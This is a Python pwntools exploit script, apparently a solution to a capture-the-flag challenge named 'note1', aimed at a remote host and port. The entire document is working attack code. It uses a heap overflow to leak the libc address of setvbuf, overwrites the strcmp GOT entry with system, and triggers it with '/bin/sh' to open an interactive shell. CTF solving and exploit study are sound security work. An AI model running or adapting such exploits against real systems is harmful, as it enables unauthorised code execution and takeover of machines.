zctf-note1.py

#!/usr/bin/env python
# coding=utf8

from pwn import p64, ELF, process, remote
from struct import unpack
from time import sleep

# p = process('./note1')
p = remote('115.28.27.103', 9001)
elf = ELF('./libc-2.19.so')

strcmp_got = 0x602048
setvbuf_got = 0x602060
system_offset_to_setvbuf = elf.symbols['system'] - elf.symbols['setvbuf']

p.sendline('1')
p.sendline('1')
p.sendline('1')
p.sendline('1')

p.sendline('1')
p.sendline('2')
p.sendline('2')
p.sendline('2')

p.sendline('1')
p.sendline('3')
p.sendline('3')
p.sendline('3')

# edit the first note to make heap overflow then leak stack address(setvbuf)
p.sendline('3')
p.sendline('1')
p.sendline('A' * 280 + p64(setvbuf_got - 0x70) + '2')

p.sendline('2')

p.recvuntil('content=')
p.recvuntil('content=')
p.recvuntil('content=')

setvbuf_addr = unpack('Q', p.recv(6) + '\x00'*2)[0]
print '[*] setvbuf_addr: ' + hex(setvbuf_addr)

# edit the second note to modify the strcmp_got to system
p.sendline('3')
p.sendline('2')
p.sendline('A' * 280 + p64(strcmp_got - 0x70) + '3')

p.sendline('3')
p.sendline('\x00')
p.sendline(p64(setvbuf_addr + system_offset_to_setvbuf))

# trigger strcmp
p.sendline('3')
p.sendline('/bin/sh')

sleep(0.1)
p.clean()

p.interactive()